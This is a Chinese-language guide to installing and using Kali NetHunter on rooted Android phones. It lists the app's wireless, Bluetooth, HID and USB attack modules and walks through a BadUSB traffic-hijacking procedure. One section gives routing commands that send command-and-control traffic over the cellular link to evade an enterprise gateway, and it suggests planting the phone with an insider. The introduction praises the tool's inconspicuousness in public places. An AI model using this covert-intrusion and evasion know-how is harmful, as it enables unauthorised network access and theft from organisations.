From：https://www.kali.org/docs/nethunter/
NetHunter 實(shí)戰(zhàn)指南：https://www.vuln.cn/6430
烏云 存檔：https://www.vuln.cn/wooyundrops

1、Kali NetHunter

Kali NetHunter 簡(jiǎn)介

Net（網(wǎng)絡(luò)），hunter（獵人）、Kali NetHunter 是基于 Kali Linux?且免費(fèi)開(kāi)源的移動(dòng)設(shè)備的滲透測(cè)試平臺(tái)，適用于 Android 設(shè)備。運(yùn)行的原理是 Android手機(jī)的 Chroot 方式?，F(xiàn)在 Kali?Nethunter 可以安裝在任何已經(jīng)? Root 的手機(jī)上，并且不用自己編譯內(nèi)核。

為什么選 Nethunter ?

因?yàn)樗粌H便于攜帶，而且在一些公共場(chǎng)所(如商場(chǎng))做一些滲透測(cè)試的時(shí)候，不容易引起注意。如果你拿個(gè)電腦或樹(shù)莓派去滲透，那肯定百分百的回頭率，搞不好還得在看守所里讓人家教育一頓，所以，便攜隱蔽的移動(dòng)滲透工具 Nethunter?就變成首選。

NetHunter?有3個(gè)版本，但是?root?版本的功能最多最強(qiáng) (能用 root 就用 root 方式安裝)

• NetHunter Rootless：無(wú)需?root，適用于 無(wú) root 設(shè)備。
• NetHunter Lite：精簡(jiǎn)版，完整的NetHunter軟件包，適用于沒(méi)有自定義內(nèi)核的 root 手機(jī)。
• NetHunter：完整版，完整的NetHunter軟件包，適用于支持自定義內(nèi)核的 root 手機(jī)。

官方博客中說(shuō) Nethunter Rootless 最多只有85%的威力，帶 root、第三方 recovery 和 Kali 定制內(nèi)核的完整版 Nethunter 才能發(fā)揮 100% 的威力。3個(gè)版本功能上的差異：

兩個(gè) root?版本都提供了額外的工具和服務(wù)。 自定義內(nèi)核可以通過(guò)添加額外的網(wǎng)絡(luò)和 USB 小工具驅(qū)動(dòng)程序以及對(duì)所選 wifi 芯片的 wifi 注入支持來(lái)擴(kuò)展該功能。Kali NetHunter?app 在兩個(gè) root 版本（NetHunter Lite 和 NetHunter）中都可用。除了 Kali Linux 中包含的滲透測(cè)試工具外，NetHunter 還支持?HID 鍵盤攻擊、BadUSB 攻擊、Evil AP MANA 攻擊等等。

Kali NetHunter 的核心包含

• Kali Linux容器，包含Kali Linux提供的所有工具和應(yīng)用程序
• Kali NetHunter App Store提供數(shù)十款專門構(gòu)建的安全應(yīng)用程序
• Android客戶端訪問(wèn) Kali NetHunter 應(yīng)用商店
• Kali NetHunter桌面體驗(yàn)（KeX）可運(yùn)行完整的Kali Linux桌面會(huì)話，支持通過(guò)HDMI或無(wú)線屏幕投射進(jìn)行屏幕鏡像

通過(guò)專用客戶端app或Web界面訪問(wèn) NetHunter App Store：https://store.nethunter.com/

關(guān)于?NetHunter 可以查看?NetHunter Components?。NetHunter 是?Kali?和社區(qū)開(kāi)發(fā)的開(kāi)源項(xiàng)目。

NetHunter 支持的設(shè)備 和 ROM

NetHunter Lite 可以安裝在所有已 root 并具有自定義?recovery?功能的 Android 設(shè)備上。完整版本的 NetHunter 需要專門為 Kali NetHunter 構(gòu)建的特定內(nèi)核的設(shè)備。

• 官方每季度發(fā)布的 NetHunter 鏡像列表：Kali NetHunter Images
• NetHunter支持的內(nèi)核列表：Kali NetHunter Kernels
• NetHunter內(nèi)核統(tǒng)計(jì)：Kali NetHunter Kernel Statistics

什么是鏡像文件？

由于歷史原因，過(guò)去的系統(tǒng)安裝文件都是以光盤的形式發(fā)布的，光盤具有鏡面屬性，將光盤上的文件專用格式提取出來(lái)的文件格式稱之為鏡像文件，后綴.iso或.img,因此iso文件默認(rèn)就是系統(tǒng)安裝包。

什么是鏡像站點(diǎn)？

鏡像站點(diǎn)就是官方軟件源的克隆，有可能不是實(shí)時(shí)的。鏡像站點(diǎn)大多都是大學(xué)教育網(wǎng)提供的多，比如清華軟件源，中科大軟件源等等。

什么是 linux 發(fā)行版？

大致上講，發(fā)行版=linux+GNU+定制化的應(yīng)用程序，有兩類著名的發(fā)行版，debian 和 redhat ，新kali發(fā)行版基于debian，舊版的kali基于ubuntu發(fā)行版，而ubuntu基于debian。debian的定制化的應(yīng)用程序軟件文件后綴.deb，redhat 的定制化的應(yīng)用程序軟件文件后綴.rpm。如果kali下的定制化的應(yīng)用程序沒(méi)有你要的軟件，也可以在debian中找到安裝到kali。

什么是軟件源？

軟件源，簡(jiǎn)稱源。源就是軟件倉(cāng)庫(kù)，包含鏡像文件，定制化的應(yīng)用程序等等，windows系統(tǒng)上安裝軟件是自行去應(yīng)用軟件官網(wǎng)下載安裝，linux下安裝截然不同，采用源的方式在線安裝，每個(gè)發(fā)行版都維護(hù)自有的軟件源，軟件源中的應(yīng)用程序是發(fā)行版官方維護(hù)的，來(lái)自于應(yīng)用軟件官網(wǎng)中的，發(fā)行版官方將它們收集到了一起。比如kali源中包含nmap的最新版本的軟件。這樣做的好處 就是極大的方便了所需專用軟件的安裝過(guò)程，一條命令就搞定。kal源的網(wǎng)址是 系統(tǒng)鏡像?https://cdimage.kali.org，應(yīng)用程序 http://http.kali.org/

Kali 幫助 文檔

官網(wǎng)?幫助：Kali Docs | Kali Linux Documentation

What is Kali Linux & Kali's features

Installing Kali Linux on desktops & laptops using ".ISO" files (x64/x86)

VMs- VMware, VirtualBox, Hyper-V, Parallels, Proxmox & Vagrant

Portable Kali on a USB drive/key/stick

Everything about ARM devices

Docker, Podman, & LXD

Windows Subsystem for Linux

AWS, Azure, Digital Ocean, & Linode

Kali on your Android phone

Misc. Everything else. Post install.

Tools inside of Kali

For when things go wrong

How to get involved with Kali

Kali around the world- Offering support to all

Kali Tools

官網(wǎng)所有工具列表：Kali Tools | Kali Linux Tools

選擇?Linux?桌面環(huán)境

這三個(gè)是最受歡迎的?Linux?桌面環(huán)境，

• GNOME - 提供功能最豐富的桌面體驗(yàn)（建議在物理機(jī)上安裝時(shí)使用它）
• KDE - Windows 用戶經(jīng)常發(fā)現(xiàn)這種更相似的設(shè)計(jì)和布局（建議在物理機(jī)上安裝時(shí)使用它）
• Xfce - 更少的資源需求，提供最快的體驗(yàn)，因?yàn)樗辉O(shè)計(jì)為“最小功能”（建議在 VM 中安裝時(shí)使用它）

如何使用 某個(gè) 工具

• 方法 1：man <tool>
• 方法 2：<tool> -h 或者?<tool> --help
• 方法 3：在工具文檔上搜索：?tool’s documentation page on the Kali Linux site
• 方法 4：查找工具的官方文檔

2、安裝?完整版(NetHunter)

設(shè)備設(shè)置 "開(kāi)發(fā)者模式"：設(shè)置 ---> 關(guān)于 ---> 點(diǎn)擊 "內(nèi)部版本號(hào)"?7次，收到已啟用開(kāi)發(fā)人員模式的通知。返回主設(shè)置頁(yè)面，將看到一個(gè)標(biāo)題為 "開(kāi)發(fā)人員選項(xiàng)"?。點(diǎn)擊進(jìn)入，然后啟用 "高級(jí)重啟"?和 "Android調(diào)試"?選項(xiàng)。

雖然 NetHunter 安裝過(guò)程已經(jīng)標(biāo)準(zhǔn)化，但是?手機(jī)的 "解鎖，root、自定義recovery"?的步驟因設(shè)備而異，甚至因Android版本而異。?推薦?recovery?使用?TWRP。 root?使用?Magisk。

Android 9、10 和 11 的重要提示：請(qǐng)確保在安裝 NetHunter 之前刷新?Universal DM-Verity、ForceEncrypt Disabler?并格式化數(shù)據(jù)分區(qū)。 Magisk 不支持加密數(shù)據(jù)分區(qū)上的用戶上下文更改，如果數(shù)據(jù)分區(qū)已加密，則在通過(guò) ssh 連接到 Kali rootfs 時(shí)會(huì)導(dǎo)致錯(cuò)誤（即“所需密鑰不可用”）。

下載?NetHunter

下載 NetHunter：https://www.kali.org/get-kali/#kali-platforms

安裝 NetHunter

在?root?后的?Android 上安裝 NetHunter

• 解鎖 Android?設(shè)備并將系統(tǒng)刷機(jī)成為?stock?AOSP?或者?LineageOS (CM)
• 安裝 Team Win Recovery?作為自定義 Recovery
• 安裝 Magisk?用來(lái) root 設(shè)備
• 如果 TWRP 無(wú)法訪問(wèn)數(shù)據(jù)分區(qū)，則可能需要禁用強(qiáng)制加密。
• 刷完自定義 recovery，剩下的就是?flash?下載的?NetHunter安裝程序zip文件到 Android 設(shè)備。

將 NetHunter?鏡像文件傳輸?shù)绞謾C(jī)上，在?recovery?模式下重新啟動(dòng)，然后在手機(jī)上刷入zip?包。完成后，重新啟動(dòng)手機(jī)進(jìn)入系統(tǒng)，首次先點(diǎn)擊 Nethunter 這個(gè) app，申請(qǐng)的所有權(quán)限都給，左側(cè)導(dǎo)航進(jìn)入Kali Chroot Manager，點(diǎn)擊 START KALI CHROOT 初始化。初始化成功后就啟動(dòng)成功了。

Home?是主頁(yè)面，除了 Offensive Security 的 Banner，還可以獲取當(dāng)前IP(內(nèi)網(wǎng)/外網(wǎng))地址。

Kali?Launcher 整合了四個(gè)啟動(dòng)器:

• 終端打開(kāi)一個(gè)Kali?Shell
• 終端打開(kāi)Kali?NetHunter Menu
• 終端打開(kāi)Wifite進(jìn)入無(wú)線破解
• 更新Kali?NetHunter(執(zhí)行sudo -c bootkali update)

對(duì)于 NetHunter 服務(wù)開(kāi)關(guān)控制，是在 Kali?Service Control 面板里進(jìn)行設(shè)置。服務(wù)有SSH、Dnsmasq、Hostapd、OpenVPN、Apache、Metasploit 及 BeEF FrameWork 等。

• SSH服務(wù)：Secure Shell,方便其他設(shè)備連接控制
• Dnsmasq服務(wù)：DNS解析服務(wù)
• Hostapd服務(wù)：提供無(wú)線接入點(diǎn)服務(wù)
• OpenVPN服務(wù)：開(kāi)放OpenVPN連入服務(wù)
• Apache服務(wù)：WEB服務(wù)
• Metasploit服務(wù)：為MSF攻擊模塊提供保障
• BeEF FrameWork服務(wù)：XSS利用框架服務(wù)

其他設(shè)備的安裝方式：

• 在 Gemini PDA 上安裝 NetHunter
• 在OnePlus 7上安裝NetHunter
• 在 TicWatch Pro 上安裝 NetHunter
• 在 TicWatch Pro 3 上安裝 NetHunter

NetHunter 終端?app 允許打開(kāi)3種終端：chroot Kali 終端，標(biāo)準(zhǔn)Android終端、root Android終端。

安裝成功后

配置

• 打開(kāi) NetHunter?app 并啟動(dòng) Kali Chroot Manager。
• 根據(jù)需要從NetHunter商店安裝任何其他應(yīng)用程序。
• 配置 Kali 服務(wù)，如 SSH。
• 設(shè)置自定義命令。
• 初始化漏洞利用數(shù)據(jù)庫(kù)。

推薦安裝的 APP

完成系統(tǒng)刷入后，要豐富NetHunter原裝工具，可以下載部分安卓APP以配合。

中文輸入法：作為一個(gè)英語(yǔ)剛及格，這個(gè)還是必備的。Gboard、搜狗輸入法、QQ輸入法

文件管理器 (如 RootExplorer、MT 管理器)：Kali 某些操作需要 Root 權(quán)限的文件管理器

v2ray、clash、ShadowSocks 等。梯子還是要有的

MiTM工具:
? ? ? ? ? ? ? ? zANTI2：雖為商業(yè)化限制部分功能,但使用體驗(yàn)的確好些.
? ? ? ? ? ? ? ? dSploit：曾經(jīng)很出名
? ? ? ? ? ? ? ? lanmitm：國(guó)內(nèi)安全工作者編寫發(fā)布的工具
? ? ? ? ? ? ? ? Intercepter-NG：嗅探工具?
? ? ? ? ? ? ? ? Network Spoofer：自帶許多?調(diào)戲/欺騙?功能

IPTools：常見(jiàn)基本網(wǎng)絡(luò)工具集合

ChangeHostname：修改當(dāng)前手機(jī)主機(jī)名HostName(還是有必要的)
WiGLE wifi：War Driving工具，收集無(wú)線熱點(diǎn)信息,可保存到本地?cái)?shù)據(jù)庫(kù).
SQLiteEditor：方便讀取數(shù)據(jù)庫(kù)信息
Hacker’s KeyBoard：NetHunter自帶，便于輸入各種控制字符
遠(yuǎn)程桌面：NetHunter自帶，便于連接VNC服務(wù)
DriveDroid：NetHunter自帶，將手機(jī)內(nèi)鏡像模擬為啟動(dòng)盤

解鎖完整 linxu 操作系統(tǒng)

ARM 設(shè)備武器化指南：https://www.anquanke.com/post/id/205455

打開(kāi) Nethunter 應(yīng)用，選擇 Kali Services，勾選 RunOnChrootStart，并打開(kāi)右側(cè)開(kāi)關(guān)：

把 SSH 和 APACHE2 都安排上，那么遠(yuǎn)控和網(wǎng)頁(yè)服務(wù)器就一起都有了，可以作為內(nèi)網(wǎng)的 cc服務(wù)器 (?C&C服務(wù)器、C&C攻擊：https://blog.csdn.net/laowu8615/article/details/78181032 )，下發(fā)一些木馬或熱補(bǔ)丁之類。"C&C服務(wù)器" 其全稱為 "command and control server"

到此，就擁有完整版的 apt 和 htop

通過(guò)手機(jī)的 type-c接口，連接：

• 一個(gè)有線網(wǎng)口接有線網(wǎng)絡(luò)
• 一個(gè)USB
• 一個(gè)無(wú)線網(wǎng)卡

執(zhí)行命令：lsusb

# lsusb
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 005: ID 0951:1643 Kingston Technology DataTraveler G3
Bus 001 Device 004: ID 0bda:8153 Realtek Semiconductor Corp. RTL8153 Gigabit Ethernet Adapter
Bus 001 Device 003: ID 0bda:8176 Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
Bus 001 Device 002: ID 0bda:5411 Realtek Semiconductor Corp. 4-Port USB 2.0 Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

可見(jiàn)全部識(shí)別出來(lái)了，并且在有線網(wǎng)絡(luò)上獲得了192.168.0.7的IP地址。

存儲(chǔ)的U盤也沒(méi)有問(wèn)題：

掃描 無(wú)線網(wǎng)：iwlist wlan0 scanning

基本上擁有了比較完整的 Linux 功能。

WIFI連內(nèi)網(wǎng)，CC走流量逃逸

一般情況下，手機(jī)開(kāi)啟流量，npc 肯定是通過(guò)流量連接cc的這一點(diǎn)毋庸置疑。

通過(guò)手機(jī)流量卡直接將數(shù)據(jù)傳出去可以繞過(guò)內(nèi)網(wǎng)網(wǎng)關(guān)，實(shí)現(xiàn)流量逃逸。

如果手機(jī)同時(shí)開(kāi)啟WIFI連接內(nèi)網(wǎng)之后，npc必定是通過(guò)WIFI網(wǎng)絡(luò)連接cc服務(wù)器的，這樣就容易被內(nèi)網(wǎng)網(wǎng)關(guān)檢測(cè)到。不管做的多么隱蔽，總歸要從企業(yè)網(wǎng)關(guān)出去。

如果可以讓npc單獨(dú)走手機(jī)卡流量，其余還是跟正常手機(jī)一樣，該去bilibili看宅舞，還是正常追劇、炒股、聊QQ還是與正常流量無(wú)異，實(shí)現(xiàn)最大程度的偽裝，這樣的設(shè)想能否實(shí)現(xiàn)呢？

其實(shí)是可以的，只需要在wlan0的路由表中，單獨(dú)加一條指定cc的IP的定向靜態(tài)路由即可。

注意，這個(gè)加一條路由不是簡(jiǎn)單的一條命令加到系統(tǒng)里就行，得先了解下現(xiàn)代安卓手機(jī)的路由系統(tǒng)的內(nèi)部架構(gòu)。

從Android5.0之后，考慮要對(duì)多網(wǎng)絡(luò)的支持，安卓采用了多路由表，在同一時(shí)間下，Android系統(tǒng)可以允許多網(wǎng)絡(luò)類型連接，而且并不是簡(jiǎn)單的網(wǎng)絡(luò)共存，而是每個(gè)網(wǎng)絡(luò)有一套自己的DNS，網(wǎng)關(guān)，路由表。比如eth0，wlan0，手機(jī)流量卡會(huì)分別有自己獨(dú)立的一套。

這樣應(yīng)用層在建立Socket連接的時(shí)候，可以自由選擇使用哪套網(wǎng)絡(luò)來(lái)完成實(shí)際的請(qǐng)求。這里還涉及到另一個(gè)新的概念不同網(wǎng)絡(luò)的標(biāo)識(shí)netid，應(yīng)用層可通過(guò)綁定指定的netid來(lái)設(shè)置該應(yīng)用走指定的網(wǎng)絡(luò)，此處感興趣可以去網(wǎng)上搜索，可以搜到很多與netid相關(guān)的代碼。

在Android 5.0之前，在同一時(shí)間下，Android系統(tǒng)只能允許一種網(wǎng)絡(luò)類型連接。之后在多網(wǎng)絡(luò)的情況下，系統(tǒng)是如何選擇的呢？這就需要引入一個(gè)關(guān)鍵名詞——策略路由，詳細(xì)資料大家可以在網(wǎng)上搜索。最終我們?cè)诓呗月酚傻幕A(chǔ)上，更改路由表wlan0，添加單條靜態(tài)路由。

理論知識(shí)有了之后，接下來(lái)就是動(dòng)手實(shí)踐。

首先來(lái)的得到我的一些環(huán)境的地址：

手機(jī)流量卡出口地址：112.192.13.128
小區(qū)出口地址：223.166.231.xxx
手機(jī)流量卡的內(nèi)部IP是：10.53.237.30
手機(jī)WIFI的內(nèi)部IP是：192.168.5.28

看看手機(jī)中都有哪些默認(rèn)路由：

# ip route show table 0 |grep default
default dev dummy0 ?table dummy0 ?proto static ?scope link?
default via 192.168.5.1 dev wlan0 ?table wlan0 ?proto static?
default via 10.53.237.29 dev rmnet_data0 ?table rmnet_data0 ?proto static?
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101
default dev dummy0 ?table dummy0 ?proto static ?metric 1024?
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101
default via fe80::d545:7c38:5509:f2a0 dev wlan0 ?table wlan0 ?proto ra ?metric 1024 ?expires 657sec
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101
unreachable default dev lo ?proto kernel ?metric 4294967295 ?error -101

可以得到手機(jī)流量卡的路由器，也就是下一跳為10.53.237.29，正是通過(guò)該地址，去跳向cc。向路由表wlan0中增加指向VPS(cc)的單條靜態(tài)路由：# ip route add table wlan0 118.126.XX.XXX via 10.53.237.29 dev rmnet_data0

添加完成后路由表 wlan0 是這樣的：

# ip route show table wlan0
default via 192.168.5.1 dev wlan0 ?proto static
118.126.XX.XXX via 10.53.237.29 dev rmnet_data0
192.168.5.0/24 dev wlan0 ?proto static ?scope link

也就是對(duì)于路由表wlan0來(lái)說(shuō)，通向VPS（cc）時(shí)，是走10.53.237.29該IP作為下一跳的，通過(guò)rmnet_data0網(wǎng)卡設(shè)備。

最后來(lái)檢查下效果如何，手機(jī)播放VPS上的視頻康康，確實(shí)是通過(guò)手機(jī)流量卡去訪問(wèn)該mp4的，實(shí)驗(yàn)成功！

最后來(lái)試下 npc，看看客戶端ip顯示的是多少：

可以看到還是手機(jī)流量卡的地址，手機(jī)其實(shí)是連著wifi的，可以看到curl ip.sb得到的還是小區(qū)出口IP。

而且使用增加單條靜態(tài)路由的方式，是不會(huì)影響手機(jī)作為代理進(jìn)行內(nèi)網(wǎng)掃描所需的路由表wlan0的。

接下來(lái)就可以把手機(jī)配發(fā)給“臥底”，讓他去連內(nèi)網(wǎng)了，不管是無(wú)線網(wǎng)羅還是有線網(wǎng)絡(luò)，都可以輕松應(yīng)對(duì)。

NetHunter app?攻擊和功能

• Home Screen?-?通用信息面板、網(wǎng)絡(luò)接口和HID設(shè)備狀態(tài)。
• Kali Chroot Manager?- 用于管理chroot元包安裝。
• Kali Services?- 啟動(dòng)/停止各種 chroot 服務(wù)。在 boot 時(shí)啟用或禁用它們。
• Custom Commands?- -將自己的自定義命令和函數(shù)添加到啟動(dòng)器。
• MAC Changer?- 更改您的Wi-Fi MAC地址（僅適用于某些設(shè)備）
• KeX Manager?- 使用Kali chroot設(shè)置即時(shí)VNC會(huì)話。
• USB Arsenal?- 控制USB小工具配置
• HID Attacks?- 各種 HID 攻擊，Teensy 風(fēng)格。
• DuckHunter HID?- Rubber Ducky?風(fēng)格的?HID?攻擊
• BadUSB MITM Attack?- Nuff said.
• MANA Wireless Toolkit?- MANA無(wú)線工具包。點(diǎn)擊按鈕，設(shè)置一個(gè)惡意的接入點(diǎn)
• Bluetooth Arsenal?- 藍(lán)牙武器庫(kù)。偵察，欺騙，聽(tīng)或注入音頻到各種藍(lán)牙設(shè)備。
• Social Engineer Toolkit?- 社會(huì)工程師工具包。建立自己的網(wǎng)絡(luò)釣魚(yú)電子郵件模板的工具包。
• MITM Framework?- MITM框架。在運(yùn)行中將二進(jìn)制后門注入下載的可執(zhí)行文件。
• NMap Scan?- NMap掃描?？焖貼map掃描儀界面。
• Metasploit Payload Generator?- -即時(shí)生成 Metasploit Payload。
• Searchsploit?- 搜索 漏洞(exploits)?在?Exploit-Database.

主要模塊及介紹如下：

• home 選項(xiàng)：主要用來(lái)自定義一些命令，查看一些信息。例如：內(nèi)核版本、busybox 版本、root 狀態(tài)、hid 狀態(tài)、網(wǎng)卡信息、外網(wǎng) ip? 等，可以自定添加、刪除、移動(dòng) 命令。
• kali chroot manager：就是 kali linux 系統(tǒng)。啟動(dòng)后可以通過(guò) vnc 鏈接，顯示界面和 kali linux 一摸一樣。
• setting：主要就是 nethunter 的一些設(shè)置。主要設(shè)置 屏幕分辨率以及自適應(yīng)屏幕、卸載 nethunter app、設(shè)置 boxybox 版本。
• kali services：顧名思義，就是 kali 服務(wù) ( kali chroot services )，可以 開(kāi)始、停止 服務(wù)。主要服務(wù)有：ssh、apache2、postgresql、dnsmasq。也可以添加、刪除自定義服務(wù)。? ?
• custom commands：自定義命令。可以添加、刪除 自定義命令。例如：更新 kali metapackages、開(kāi)啟wlan0為監(jiān)聽(tīng)模式、關(guān)閉wlan0的監(jiān)聽(tīng)模式、開(kāi)啟wlan1為監(jiān)聽(tīng)模式
• mac changer：改變 mac 地址。安卓10已經(jīng)提供了隨機(jī) mac ，如果想自定義 mac，可以使用這個(gè)選項(xiàng)進(jìn)行更改
• kex manager：這個(gè)是 kali 桌面管理程序，通過(guò)這個(gè)程序，可以以 圖形用戶界面的方式訪問(wèn) kali ( kali chroot manager )
• USB?arsenal：USB 武器庫(kù)。
  Dictionary based brute force attack：自動(dòng)輸入字典一行內(nèi)容并回車,基于HID,模擬操作方式的暴力破解
  deADBolt：執(zhí)行一堆ADB命令可以推送隱私文件等信息到指定目錄,參考項(xiàng)目主頁(yè) https://github.com/photonicgeek/deADBolt
• HID 攻擊：
• duckhunter HID?
• usb 中間人攻擊
• Wireless Attacks：無(wú)線工具
  ? ? ? ? Wifite：自動(dòng)無(wú)線安全審計(jì)工具
  ? ? ? ? Kismet：無(wú)線WarDriving工具
  ? ? ? ? AP F**ker：無(wú)線網(wǎng)惡意攻擊工具(多為拒絕服務(wù))
  ? ? ? ? Wash：掃描開(kāi)啟WPS的無(wú)線網(wǎng)絡(luò)
  ? ? ? ? Airodump-ng：基本無(wú)線攻擊套件(必備)
  ? ? ? ? Pingen：針對(duì)某些開(kāi)啟WPS的D-link的路由器計(jì)算其PIN碼以破解
• Exploit (漏洞) Tools
  ? ? Metasploit：強(qiáng)大、核心、必備
  ? ? BeEF-XSS：XSS滲透測(cè)試工具，看個(gè)人習(xí)慣使用
  ? ? Social-Engineering-Toolkit：Kali下的SET，社會(huì)工程學(xué)套件，功能強(qiáng)大。
  ? ? MITMf：已停止更新，推薦使用 Bettercap：https://github.com/bettercap/bettercap
• Sniffing / Spoofing
  ? ? tcpdump：基本流量Dump工具
  ? ? tshark：WireShark的Cli工具,可抓取分析流量
  ? ? urlsnarf：Dsniff工具包一部分,可嗅探HTTP請(qǐng)求包內(nèi)容，并以CLF通用日志格式輸出
  ? ? dsniff：強(qiáng)大的知名口令嗅探工具包
  ? ? MITMproxy：中間代理,可截獲修改HTTP流量
• Reverse Shells
  ? ? AutoSSH：通過(guò) SSH 反彈 shell (NAT Bypass)
  ? ? pTunnel：通過(guò) ICMP 數(shù)據(jù)包隧道傳送數(shù)據(jù)
• Info Gathering
  ? ? Spiderfoot：開(kāi)源掃描與信息收集工具，對(duì)給定域名收集子域，Email地址，web服務(wù)器版本等信息，自動(dòng)化掃描。
  ? ? Recon-ng：強(qiáng)大的信息收集工具，模塊化，可惜許多插件國(guó)內(nèi)不適用(有墻)。
  ? ? Device-pharmer：通過(guò)Shodan搜索，大數(shù)據(jù)Hacking。
• Vulnerability Scan：OpenVas 漏洞掃描器，好不好用客官自行定奪。
• OpenVPN Setup：OpenVPN 設(shè)置
• VNC Setup：VNC 設(shè)置
• Log/Capture Menu：可擦除本地所有抓取數(shù)據(jù)或同步到SD卡上(同步主要是解決權(quán)限問(wèn)題。比如多數(shù)安卓APP未獲得root權(quán)限是無(wú)法讀取NetHunter工具截獲的數(shù)據(jù)內(nèi)容)
• NFC Attack：提供了復(fù)制、重寫、查看M卡數(shù)據(jù)功能(是不是不必帶上 Acr122u 了)
• Monitor Mode：?jiǎn)?dòng)或關(guān)閉wlan1(外置無(wú)線網(wǎng)卡)的混雜監(jiān)聽(tīng)模式
• Eject USB Wifi：彈出USB無(wú)線網(wǎng)卡
• WI-FI 滲透利器 Pineapple Nano ( ：https://www.freebuf.com/sectool/196358.html?) "pineapple connector (菠蘿連接器)、Nano、USB OTG電纜" 一起使用。
• wardriving：字面意思是 "戰(zhàn)爭(zhēng)駕駛、駕駛攻擊"。"駕駛"?是相當(dāng)字面的。黑客駕駛汽車（或有時(shí)是其他車輛，如自行車）四處走動(dòng)，配備特殊設(shè)備，可繪制出不安全的 Wi-Fi 網(wǎng)絡(luò)。其實(shí)就是不斷的改變位置信息進(jìn)行攻擊。在 NetHunter 的 Wireless 模塊中 Kismet 作為 WarDriving 的默認(rèn)工具，不過(guò)操作起來(lái)畫面太美不敢看。在啟動(dòng) kismet 之前，請(qǐng)確保您的無(wú)線接口處于監(jiān)視器模式。由于監(jiān)視器模式 QCACLD-3.0 驅(qū)動(dòng)程序，也可以使用內(nèi)部無(wú)線接口。
• deauth：死亡認(rèn)證，顧名思義，就是讓別人的無(wú)線鏈接認(rèn)證都失敗從而無(wú)法上網(wǎng)。

BadUSB MITM?攻擊

啟用此 USB 模式會(huì)在插入目標(biāo)計(jì)算機(jī)時(shí)，會(huì)將?OTG USB 電纜的設(shè)備變成網(wǎng)絡(luò)接口，強(qiáng)制將?PC（Windows 或 Linux）的所有流量通過(guò)USB 電纜轉(zhuǎn)到?NetHunter 設(shè)備，其中流量可以是 MitM'd。

插一個(gè)U盤黑一臺(tái)電腦-Badusb最詳細(xì)制作教程：https://cloud.tencent.com/developer/article/1544687

BadUSB Attack 是 BlackHat 大會(huì)上公布的一種較先進(jìn)的USB攻擊方式，模擬鍵盤操作等 Payload可自動(dòng)執(zhí)行某些操作，而 NetHunter 的 BadUSB MiTM Attack 則是其中一種玩法：修改網(wǎng)絡(luò)設(shè)定，劫持網(wǎng)絡(luò)流量。

操作過(guò)程如下：首先，確保手機(jī)連接目標(biāo)計(jì)算機(jī)時(shí)，MTP文件傳輸是關(guān)閉的。連接目標(biāo)計(jì)算機(jī)，打開(kāi)手機(jī)USB網(wǎng)絡(luò)共享。

此時(shí)在 NetHunter Home 打開(kāi)一個(gè) Kali Shell，查看網(wǎng)卡多出虛擬網(wǎng)卡rndis0(USB網(wǎng)絡(luò)共享網(wǎng)卡)。

此時(shí)可以開(kāi)啟 Tcpdump 截獲流量，命令：tcpdump -i rndis0

回到 NetHunter Home，切換到BadUSB MiTM Attack，勾選右上角選項(xiàng) Start BadUSB Attack

被連接的計(jì)算機(jī)此時(shí)會(huì)多出一個(gè)網(wǎng)卡，網(wǎng)關(guān)為rndis0的IP地址

此時(shí)流量已可以截獲，例如訪問(wèn)某些網(wǎng)站，手機(jī) tcpdump 處流量顯示如圖:

因?yàn)槭謾C(jī)并未插入SIM卡,無(wú)網(wǎng)絡(luò),故PC機(jī)并無(wú)法得到返回頁(yè)面。當(dāng)出現(xiàn)雙網(wǎng)關(guān)時(shí)，如果流量直接沒(méi)有走向惡意網(wǎng)關(guān)（10.0.0.1）而是依舊走的之前的網(wǎng)關(guān)（192.168.1.1）時(shí)劫持會(huì)失敗。默認(rèn)劫持后的網(wǎng)關(guān)優(yōu)先級(jí)更高，故流量可以正常劫持并走向惡意網(wǎng)關(guān)。

配合HID Keyboard Attack進(jìn)行攻擊也是很好的方式，至于數(shù)據(jù)包的保存與分析則可自行發(fā)揮。

USB-Arsenal (USB?軍械庫(kù))

Arsenal (軍械庫(kù)、兵工廠)。USB-Arsenal 是基于 USB 的攻擊的控制中心。它用于使用 USB 功能選擇器啟用 USB 小工具模式：

如果啟用了大容量存儲(chǔ)小工具模式，則可以在將設(shè)備連接到計(jì)算機(jī)的 USB 端口之前，將 .iso 和 .img 文件安裝在映像掛載程序菜單中，然后將 NetHunter 視為安裝了映像的 USB 驅(qū)動(dòng)器：

如果啟用了 RNDIS 小工具模式，則 USB 網(wǎng)絡(luò)共享菜單可用于各種基于網(wǎng)絡(luò)接口的攻擊：

Bluetooth-Arsenal (藍(lán)牙軍械庫(kù))

Arsenal (軍械庫(kù)、兵工廠)。Bluetooth-Arsenal 是基于藍(lán)牙的攻擊的控制中心。點(diǎn)擊菜單項(xiàng)，選擇 "Bluetooth Arsenal"，打開(kāi)藍(lán)牙菜單。在這里，可以啟動(dòng)和停止服務(wù)，啟用接口，掃描可發(fā)現(xiàn)的設(shè)備。請(qǐng)注意，使用下一頁(yè)中的Redfang，也可以找到未處于發(fā)現(xiàn)模式的設(shè)備。目前不支持 BLE。

在第一次運(yùn)行：需要點(diǎn)擊 "檢查和安裝"?在歡迎彈出安裝依賴項(xiàng)。如果你將來(lái)需要設(shè)置或更新，可以隨時(shí)使用右上角的選項(xiàng)菜單。

OTG?可以利用各種設(shè)備上的USB口進(jìn)行數(shù)據(jù)交換。解決了各種設(shè)備間不同制式的連接接口的數(shù)據(jù)交換不便的問(wèn)題。也就是說(shuō)，OTG主要應(yīng)用于各種不同的設(shè)備（包括移動(dòng)設(shè)備）間的聯(lián)接，尤其是現(xiàn)在市面上琳瑯滿目的各種移動(dòng)電子設(shè)備，比如平板電腦、移動(dòng)電話、打印機(jī)、消費(fèi)類電子設(shè)備等。目前市面上的智能手機(jī)上基本都支持OTG。

鑒于設(shè)備接口及USB類型的不一致，一般OTG有如下幾類：

• USB2.0?OTG：包括Micro 5PIN?OTG（常見(jiàn)安卓手機(jī)）、Mini 5PIN?OTG（常見(jiàn)安卓平板）
• Micro USB3.0?OTG：三星Note3、Galaxy S5等在2016年以前的安卓手機(jī)OTG接口
